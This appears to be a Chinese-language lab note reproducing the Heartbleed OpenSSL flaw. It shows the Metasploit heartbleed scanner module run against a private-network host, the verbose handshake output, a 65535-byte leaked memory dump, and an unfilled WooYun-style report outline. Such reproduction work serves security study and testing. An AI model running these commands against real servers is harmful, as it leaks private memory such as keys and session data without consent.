HEARTBLEED 漏洞复现
漏洞分析的两篇文章
https://blog.csdn.net/javajiawei/article/details/82429886
set verbose true 才能看到
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 172.16.20.134
rhosts => 172.16.20.134
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
[*] 172.16.20.134:443 - Sending Client Hello...
[*] 172.16.20.134:443 - SSL record #1:
[*] 172.16.20.134:443 - Type: 22
[*] 172.16.20.134:443 - Version: 0x0301
[*] 172.16.20.134:443 - Length: 86
[*] 172.16.20.134:443 - Handshake #1:
[*] 172.16.20.134:443 - Length: 82
[*] 172.16.20.134:443 - Type: Server Hello (2)
[*] 172.16.20.134:443 - Server Hello Version: 0x0301
[*] 172.16.20.134:443 - Server Hello random data: 5d7264f5d2c75e1260dc4814f823de44d904a502fd2edf425339c31c0fb7c13b
[*] 172.16.20.134:443 - Server Hello Session ID length: 32
[*] 172.16.20.134:443 - Server Hello Session ID: cae101f7a275d73520601fcaacf8038a70e79f3b40c56163c8e4366c065db0af
[*] 172.16.20.134:443 - SSL record #2:
[*] 172.16.20.134:443 - Type: 22
[*] 172.16.20.134:443 - Version: 0x0301
[*] 172.16.20.134:443 - Length: 909
[*] 172.16.20.134:443 - Handshake #1:
[*] 172.16.20.134:443 - Length: 905
[*] 172.16.20.134:443 - Type: Certificate Data (11)
[*] 172.16.20.134:443 - Certificates length: 902
[*] 172.16.20.134:443 - Data length: 905
[*] 172.16.20.134:443 - Certificate #1:
[*] 172.16.20.134:443 - Certificate #1: Length: 899
[*] 172.16.20.134:443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0xd58a318>, issuer=#<OpenSSL::X509::Name:0xd58a330>, serial=#<OpenSSL::BN:0xd58a348>, not_before=2019-09-06 10:42:27 UTC, not_after=2020-09-05 10:42:27 UTC>
[*] 172.16.20.134:443 - SSL record #3:
[*] 172.16.20.134:443 - Type: 22
[*] 172.16.20.134:443 - Version: 0x0301
[*] 172.16.20.134:443 - Length: 331
[*] 172.16.20.134:443 - Handshake #1:
[*] 172.16.20.134:443 - Length: 327
[*] 172.16.20.134:443 - Type: Server Key Exchange (12)
[*] 172.16.20.134:443 - SSL record #4:
[*] 172.16.20.134:443 - Type: 22
[*] 172.16.20.134:443 - Version: 0x0301
[*] 172.16.20.134:443 - Length: 4
[*] 172.16.20.134:443 - Handshake #1:
[*] 172.16.20.134:443 - Length: 0
[*] 172.16.20.134:443 - Type: Server Hello Done (14)
[*] 172.16.20.134:443 - Sending Heartbeat...
[*] 172.16.20.134:443 - Heartbeat response, 65535 bytes
[+] 172.16.20.134:443 - Heartbeat response with leak
[*] 172.16.20.134:443 - Printable info leaked:
......]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 16008 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@..........................................................................................................................................................................................................................................................................................................................................<.......<..............................................................................fE..............................a........2..................................................................................................................................... repeated 3708 times .....................................................................................................................................q........................................................................... ........u.5 `......p..;@.ac..6l.]......W...$..(..Kl.q...z..........................................................................,........dr]............................@.......................................................................................................................1.......2.......p;..........@...................1........V..WS..\.....J.%.!......].%..q.0.......1...............................................1..........)b....0.x......!.. ..4H....0.........1...............................................1...............................................!...............................!.........6.....jfx...&...~.....1.......................................0.......1...............................................1...............................................q...............................................................................................................a.........g......=......................p........................;..............................1.......Q%c.....................................1...............................................!........1......................A.........e..................... .................R.....@.......!...............................A.........e.......................................R.....p.......!....................... .......1.......<....0.y..._...u.%bw+s.y.U7.v_..........a.........g.....@........................................................................................<.......<.......................6.............. ....... .......................@....... ...............x6..............p.......................................................................................................................0.......x6..............................................................................................................................................................................................................................................................................A........6...... H......................................`.......`...............................................p.......................................................x6......@.......................#.....}s&5RW.f..4...w..g......K...2ms1...R.=.S.s.`{.EA.".N,......`...'._....8.;..z..k..Q....a..B..6..5.......................................sU..O}.\;.QFQ..T..z.2.........z..j.....h&D".4..z..%.K.&..........V.+|..`.?..UK!J..s.]....'.Z... .|Z....d...L...)Ie-........x6...............................6..............................................................................................................................................................................................................................................................................................................................................................................................A.......x6..................................................................................................................................... repeated 764 times .....................................................................................................................................1....... 4......`9..............................................................................................................................................................................................................................................................!................6..............0...............................................1.......Q%c.....................................!.........6.....jfx...&...~.....1........V..WS..\.....J.%.!......].%..q.........a.......x:..................................................................................................................................... repeated 252 times .....................................................................................................................................Q...............x6..................................................................................................................................... repeated 260 times .....................................................................................................................................1........6.......6......................`.......@...............................................................A...............................................................!.............]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 5856 times .....................................................................................................................................@..................................................................................................................................... repeated 16103 times .....................................................................................................................................
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
乌云案例
详细说明:
抓了一小会就有三个:
漏洞证明:
修复方案:
补丁
